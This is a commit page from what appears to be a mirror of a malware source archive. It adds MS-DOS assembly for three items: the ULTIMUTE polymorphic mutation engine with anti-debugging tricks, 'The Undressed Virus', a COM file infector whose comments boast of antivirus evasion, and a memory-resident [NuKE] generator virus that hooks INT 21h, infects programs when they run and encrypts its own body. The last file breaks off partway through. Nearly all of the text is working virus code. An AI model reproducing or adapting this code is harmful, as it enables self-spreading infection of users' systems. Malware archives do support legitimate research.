daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

re-organize

Browse Source 
push
This commit is contained in:
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/U-Index/Virus.MSDOS.Unknown.ultimute.asm
+584
View File
@@ -0,0 +1,584 @@
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
; pardon the title, had to think of something... }-)
;
;ULTIMUTE is a mutation engine written for security-type applications and
;other areas where mutation of executable code is necessary. For my personal
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
;using it to encrypt the code placed onto EXE's and COM's to protect them
;from simple modification and/or unauthorized use. The encryption algorithms
;themselves are terribly simple - the main point being that they change
;each time and are difficult to trace through. This engine is written mainly
;to keep a "hack one, hack 'em all" approach from working on protected code,
;rather than to keep the code secure by a cryptologist's point of view.
;
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
; code, largely variable size for decoder. Also includes variable
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
; near call, far call, or interrupt, the last of which can be
; useful as a memory-resident handler for multiple programs to
; use).
;
;Note: Please - this program and it's source have been released as freeware,
; but do NOT use the mutation engine in viruses! For one thing, the
; decryptor sequence has several repetitive sequences that can be scanned
; for, and for another, that just isn't what it was designed for and
; I would NOT appreciate it. If you MUST use someone else's mutation
; engine for such, use the TPE or MTE. I do NOT condone such, however.
;
;Any modifications made to this program should be listed below the solid line,
;along with the name of the programmer and the date the file was changed.
;Also - they should be commented where changed. If at all possible, report
;modifications to file to the address listed in the documentation.
;
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
;resulting from the use/misuse of this program. The user agrees to hold
;the author harmless for any consequences that may occur directly or
;indirectly from the use of this program by utilizing this program/file
;in any manner. Please use the engine with care.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;Modifications:
; None as of yet (original release version)
.model tiny
.radix 16
.code
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
;Underscores are used so that these routines can be called from C and other
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
;need to add underscores in their names as well. Also, the random number
;generations may not be sound for all purposes. They do the job for this
;program, but they may/may not be mathematically correct.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;ENTRY:
; CX=Code Length BX=New_Entry_Point
; DS:SI=Code AX=Calling Style
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
;
;RETURN:
; CX=New Size ES:DI = Same, now contains encrypted code
; w/decryptor
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_ULTMUTE:
push bp ax bx cx dx es ds si di
call Get_Our_Offset
Offset_Mark:
inc cx
inc cx
mov word ptr cs:[bp+1+Set_Size],cx
mov word ptr cs:[Start_Pos+bp],bx
call Init_Rand
call Get_Base_Reg
call Setup_Choices
call Create_EncDec
call Copy_Decrypt_Code
call Encrypt_It
Ending_ULTMUTE:
pop di si ds es dx cx bx ax
add cx,cs:[Decryptor_Length+bp]
inc cx
inc cx
pop bp
cmp ax,3 ;Select Returning method, i.e. retn, retf, iret
je Int_Call
cmp ax,2
je Far_Call
Near_Call:
retn
Far_Call:
retf
Int_Call:
iret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Our_Offset:
mov bp,sp
mov bp,ss:[bp] ;This trick finds our current offset
sub bp,offset Offset_Mark ;from the compiling point, as it
ret ;is usually not constant....
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Init_Rand:
push ax ds
xor ax,ax
mov ds,ax
mov ax,ds:[46c] ;Get seed from timer click at
pop ds ;0000:046c
mov cs:[rand_seed+bp],ax
pop ax
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Rand:
push cx dx
mov ax,cs:[rand_seed+bp]
mov cx,0deadh
mul cx ;This probably isn't a good algorithm,
xor ax,0dada ;(understatement) but it works for
ror ax,1 ;our purposes in this application.
mov cs:[rand_seed+bp],ax
pop dx cx
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
rand_seed dw 0
Base_Reg db 0
Base_Pointer db 0
Start_Pos dw 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Get_Base_Reg:
call Get_Rand
and ax,11b
cmp al,1 ;Eliminate CX for loop purposes
je Get_Base_Reg
mov byte ptr cs:[bp+Base_Reg],al
Do_Pointer_Reg:
call Get_Rand
shr al,1
jc Done_Base_Reg
mov byte ptr cs:[bp+Base_Pointer],0
ret
Done_Base_Reg:
mov byte ptr cs:[bp+Base_Pointer],1
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Setup_Choices:
push ds si
push cs
pop ds
mov si,bp
call Get_Rand
mov word ptr [si+Xor_It+2],ax ;Randomize Xor
call Get_Rand
mov word ptr [si+Dummy3+2],ax ;Randomize Add/Sub
mov word ptr [si+Dummy7+2],ax
call Get_Rand ;Randomize Add/Sub
mov word ptr [si+Dummy4+2],ax
mov word ptr [si+Dummy8+2],ax
call Get_Rand
mov byte ptr [si+Rand_Byte1],al ;Randomize Random bytes
mov byte ptr [si+Rand_Byte2],ah
call Get_Rand
mov byte ptr [si+Rand_Byte3],al
mov byte ptr [si+Rand_Byte4],ah
call Get_Rand
mov byte ptr [si+Rand_Byte5],al
mov byte ptr [si+Rand_Byte6],ah
call Get_Rand
mov byte ptr [si+Rand_Byte7],al
mov byte ptr [si+Rand_Byte8],ah
call Get_Rand
mov byte ptr [si+Rand_Byte9],al
mov byte ptr [si+Rand_Byte10],ah
mov al,byte ptr [si+Base_Reg]
Set_Switcher:
and byte ptr [si+Switcher+1],0e6 ;Delete Register
mov ah,al
shl ah,1
shl ah,1
shl ah,1
or byte ptr [Switcher+1+si],ah
Set_Switcher_Pointer:
push ax
mov al,byte ptr [si+Base_Pointer]
or byte ptr [si+Switcher+1],al
Set_Set_Pointy:
and byte ptr [si+Set_Pointy],0fe
or byte ptr [si+Set_Pointy],al
and byte ptr [si+Inc_Pointy],0fe
or byte ptr [si+Inc_Pointy],al
and byte ptr [si+Inc_Pointy+1],0fe
or byte ptr [si+Inc_Pointy+1],al
pop ax
Set_Xorit:
and byte ptr [si+Xor_It+1],0fc
or byte ptr [si+Xor_It+1],al
Set_Flip_It:
and byte ptr [si+Flip_It+1],0e4
or byte ptr [si+Flip_It+1],al
or byte ptr [si+Flip_It+1],ah
Set_Rotate_It:
and byte ptr [si+do_rotate+1],0fc
or byte ptr [si+do_rotate+1],al
and byte ptr [si+do_rot2+1],0fc
or byte ptr [si+do_rot2+1],al
Set_IncDec:
and byte ptr [si+inc_bx_com],0fc
or byte ptr [si+inc_bx_com],al
and byte ptr [si+dec_bx_com],0fc
or byte ptr [si+dec_bx_com],al
and byte ptr [si+Dummy5],0fc
or byte ptr [si+Dummy5],al
and byte ptr [si+Dummy6],0fc
or byte ptr [si+Dummy6],al
Set_AddSub:
and byte ptr [si+Dummy3+1],0fc
and byte ptr [si+Dummy4+1],0fc
or byte ptr [si+Dummy3+1],al
or byte ptr [si+Dummy4+1],al
and byte ptr [si+Dummy7+1],0fc
and byte ptr [si+Dummy8+1],0fc
or byte ptr [si+Dummy7+1],al
or byte ptr [si+Dummy8+1],al
pop si ds
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Create_EncDec:
push es di cx
push cs
pop es
lea di,[bp+Encrypt_Sequence]
call Get_Rand
and ax,1fh
shr ax,1 ;Insure odd number of encryptors to prevent
shl ax,1 ;things like "INC AX / DEC AX" to leave prog
inc ax ;unencrypted.
mov byte ptr cs:[bp+Encrypt_Length],al
xchg cx,ax
Make_Pattern:
call Get_Rand
and ax,7
stosb
loop Make_Pattern
pop cx di es
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Copy_Decrypt_Code:
push si di bx cx ds
push bx di ;save for loop
push cs
pop ds
lea si,[bp+Set_Pointy]
movsw
movsb
lodsb ;Copy initial encryptor
movsw
movsb
lodsb
movsw
mov cl,byte ptr cs:[bp+Encrypt_Length]
xor ch,ch
lea si,[Encrypt_Sequence+bp] ;didn't have bp earlier
Dec_Set_Loop:
push cx
lodsb
push si ;Create the Decryptor from Sequence
mov bl,al
xor bh,bh
shl bx,1
add bx,bp
add bx,offset Command_Table
mov ax,cs:[bx]
mov cl,ah
xor ah,ah
lea si,[Xor_It+bp]
add si,ax
repnz movsb
pop si
pop cx
loop Dec_Set_Loop
lea si,[Switcher+bp]
movsw
lodsb ;Finish off Decryptor
movsw
lodsb
movsw ;Loop Setup
movsw
pop si bx
mov ax,di ;Set Loop
sub ax,si ;Do size of loop and offset from loop
mov cs:[Decryptor_Length+bp],ax
push ax ;Changed for Jump
not ax
add ax,5
stosw
pop ax
add bx,ax ;Set initial Pointer
mov es:[si+1],bx
mov ax,di
pop ds cx bx di si
push si di bx cx
Copy_Prog:
push ax
sub ax,di
add ax,bx
mov word ptr es:[di+1],ax
pop ax
mov di,ax
repnz movsb
pop cx bx di si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Encrypt_It:
push bx cx di si
call set_seqp
mov ax,cs:[Decryptor_Length+bp]
inc ax
inc ax
add di,ax ;DI=start of code to be encrypted
;CX=Length of code to encrypt
mov si,di
push es
pop ds
Big_Enc_Loop:
push cx
call Switcher
mov cx,cs:[Encrypt_Length+bp]
Encrypt_Value:
push ax bx cx dx si di
mov si,cs:[Save_SI+bp]
dec si
mov bl,cs:[si] ;??
mov cs:[Save_SI+bp],si
lea si,cs:[Com_Table_2+bp]
xor bh,bh
shl bx,1
add si,bx
mov bx,cs:[si]
add bx,bp
mov word ptr cs:[Next_Command+bp],bx
pop di si dx cx bx ax
call cs:[Next_Command+bp]
Loop Encrypt_Value
pop cx
call Switcher
call Inc_Pointy
call set_seqp
loop Big_Enc_Loop
pop si di cx bx
ret
Save_SI dw 0
Next_Command dw 0
set_seqp:
push si
lea si,cs:[Encrypt_Sequence+bp] ;SI=Encrypt_Sequence
add si,cs:[Encrypt_Length+bp] ;SI=End of Encrypt Sequence
mov cs:[Save_SI+bp],SI
pop si
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Command_Table: ;8 commands -> 3 bits.
db [Xor_It-Xor_It],(Flip_It-Xor_It-1)
db [Flip_It-Xor_It],(Rotate_It_1-Flip_It-1)
db [Rotate_It_1-Xor_It],(Rotate_It_2-Rotate_It_1-1)
db [Rotate_It_2-Xor_It],(Dummy1-Rotate_It_2-1)
db [Dummy1-Xor_It],(Dummy2-Dummy1-1)
db [Dummy2-Xor_It],(Dummy3-Dummy2-1)
db [Dummy3-Xor_It],(Dummy4-Dummy3-1)
db [Dummy4-Xor_It],(Dummy5-Dummy4-1)
Com_Table_2:
dw [offset Xor_It]
dw [offset Flip_It]
dw [offset Rotate_It_2]
dw [offset Rotate_It_1]
dw [offset Dummy5]
dw [offset Dummy6]
dw [offset Dummy7]
dw [offset Dummy8]
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Set_Pointy:
mov di,1234 ;Pointer to Code
ret
Set_Size:
mov cx,1234 ;Size
ret
Switcher:
xchg bx,[di]
ret
Inc_Pointy:
inc di
inc di
ret
Loop_Mut:
dec cx
jz End_Loop_Mut
loop_set:
jmp _ULTMUTE
End_Loop_Mut:
ret
Xor_It:
xor bx,1234
ret
Flip_It:
xchg bh,bl
ret
Rotate_It_1:
jmp before_rot
do_rotate:
ror bx,1
jmp after_rot
before_rot:
push ax
call Ports1
pop ax
jmp do_rotate
Ports1:
in al,21
or al,02
out 21,al
ret
Ports2:
in al,21
xor al,02
out 21,al
ret
after_rot:
push ax
call ports2
pop ax
ret
Rotate_It_2:
cli
jmp confuzzled1
do_rot2:
rol bx,1
call Switch_Int_1_3
jmp donerot2
confuzzled1:
call Switch_Int_1_3
jmp do_rot2
Switch_Int_1_3:
push ax ds
xor ax,ax
mov ds,ax
jmp short exch1
db 0eah
exch1:
xchg ax,word ptr ds:[4]
jmp short exch2
db 9ah
exch2:
xchg ax,word ptr ds:[0c]
xchg ax,word ptr ds:[4]
pop ds ax
ret
donerot2:
ret
Dummy1:
jmp short inc_bx_com ;Kill Disassemblers
db 0ea
Rand_Byte1:
db 0ea
inc_bx_com:
inc bx
ret
Dummy2:
jmp short Kill_1
Rand_Byte2:
db 0ea
Cont_Kill1:
cli
xchg ax,ds:[84]
xchg ax,ds:[84]
sti
pop ds ax
dec_bx_com:
dec bx
jmp short quit_Kill1
Kill_1:
push ax ds
xor ax,ax
mov ds,ax ;Anti-Debugger (Kills Int 21)
jmp short Cont_Kill1
Rand_Byte3:
db 0e8
quit_Kill1:
ret
Dummy3:
add bx,1234
push bx
call throw_debugger
Rand_Byte4:
db 0e8 ;Prefetch Trick
into_throw:
sub bx,offset Rand_Byte4
add byte ptr [bx+trick_em+1],0ba
trick_em:
jmp short done_trick
Rand_Byte5:
db 0ea
throw_debugger:
pop bx
jmp short into_throw
Rand_Byte6:
db 0ea
done_trick:
sub byte ptr [bx+trick_em+1],0ba
pop bx
ret
Dummy4:
sub bx,1234
jmp short Get_IRQ
Rand_Byte7 db 0e8
Kill_IRQ:
out 21,al
xor al,2
jmp short Restore_IRQ
Rand_Byte8 db 0e8
Rand_Byte9 db 0e8 ;This will kill the keyboard
Get_IRQ: ;IRQ
push ax
in al,21
xor al,2
jmp short Kill_IRQ
Rand_Byte10 db 0e8
Restore_IRQ:
out 21,al
pop ax
ret
;The following are used for the encryption algorithm to reverse commands that
;include anti-tracing.
Dummy5:
dec bx
ret
Dummy6:
inc bx
ret
Dummy7:
sub bx,1234
ret
Dummy8:
add bx,1234
ret
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Decryptor_Length dw 0
Encrypt_Length dw 0
Encrypt_Sequence db 30 dup(0)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_END_ULTMUTE:
end _ULTMUTE
MSDOS/U-Index/Virus.MSDOS.Unknown.undr.asm
+126
View File
@@ -0,0 +1,126 @@
; Virus: The Undressed Virus
; Author: Arsonic[Codebreakers]
; Type: Appending
; Encryption: No
;
; Displays a Message on Feb 5th.
; Btw.. I Love Lisa..!
;---------------------------------------------------------------------------------------------------
; AV-Product | Detected? | Comments
;---------------------------------------------------------------------------------------------------
; F-Prot | No | Easy to Get Past.. FPROT SUCKS!
; TBAV | Unknown Virus | Well.. at least it aint say VCL!
; AVP | VCL.824 | VCL! ARRGGGHH!
;----------------------------------------------------------------------------------------------------
db 0e9h,0,0
start:
call delta
delta:
pop bp
sub bp,offset delta
mov cx,0ffffh ;kill heristics
fprot_loopy:
jmp back
mov ax,4c00h
int 21h
back:
loop fprot_loopy
mov cx,3
nop
mov di,100h
nop
lea si,[bp+buffer]
nop
rep movsb
find_first:
mov ah,4ch
add ah,2
nop
find_next:
nop
lea dx,[bp+filemask]
nop
int 21h
jnc infect
jmp check_payload
infect:
mov ax,3d02h
mov dx,9eh
int 21h
xchg ax,bx
mov ah,3dh
add ah,2
mov cx,3
lea dx,[bp+buffer]
int 21h
mov ax,word ptr[80h + 1ah]
nop
sub ax,end - start + 3
nop
cmp ax,word ptr[bp+buffer+1]
nop
je close_file
mov ax,word ptr[80h + 1ah]
nop
sub ax,3
nop
mov word ptr[bp+three+1],ax
mov ax,4200h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+three]
nop
mov cx,3
nop
int 21h
mov ax,4202h
xor cx,cx
cwd
int 21h
mov ah,3eh
add ah,2
nop
lea dx,[bp+start]
nop
mov cx,end - start
nop
int 21h
close_file:
mov ah,3ch
add ah,2
int 21h
mov ah,4dh
add ah,2
jmp find_next
check_payload:
mov ah,2ah
int 21h
cmp dh,2 ;is it febuary?
je next
jmp close
next:
cmp dl,5 ;the 5th?
je payload ;yes.. display the message
jmp close ;no.. return control to the program.
payload:
mov ah,9h ;display message
lea dx,[bp+message]
int 21h
int 00h ;get keypress
int 16h
int 20h ;return to dos.
close:
mov di,100h ;return control to program
jmp di
three db 0e9h,0,0
filemask db '*.co*',0 ;if *.com it would be detected as trival variant
buffer db 0cdh,20h,0
virus db 'The UnDreSSeD',0 ; messages to give those av'ers a
author db 'Arsonic[CB]',0 ; nice scan string..
message db 'Happy Birthday Lisa!',10,13,'$'
Lisa db 'I LOVE U LISA!',0
end:
MSDOS/U-Index/Virus.MSDOS.Unknown.unevie.asm
+473
View File
@@ -0,0 +1,473 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿsub byte ptr [di],087h
inc word ptr [di]
xor byte ptr [di],022h
inc word ptr [di]
xor byte ptr [di],030h
add byte ptr [di],075h
xor byte ptr [di],061h
sub byte ptr [di],0b9h
xor word ptr [di],0e185h
add word ptr [di],0aa17h
not word ptr [di]
inc byte ptr [di]
inc word ptr [di]
xor word ptr [di],0c3d7h
sub word ptr [di],04a83h
not byte ptr [di]
xor word ptr [di],06acdh
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db '[NuKE] N.R.L.G. AZRAEL'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
xor word ptr [di],06acdh
not byte ptr [di]
add word ptr [di],04a83h
xor word ptr [di],0c3d7h
dec word ptr [di]
dec byte ptr [di]
not word ptr [di]
sub word ptr [di],0aa17h
xor word ptr [di],0e185h
add byte ptr [di],0b9h
xor byte ptr [di],061h
sub byte ptr [di],075h
xor byte ptr [di],030h
dec word ptr [di]
xor byte ptr [di],022h
dec word ptr [di]
add byte ptr [di],087h
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
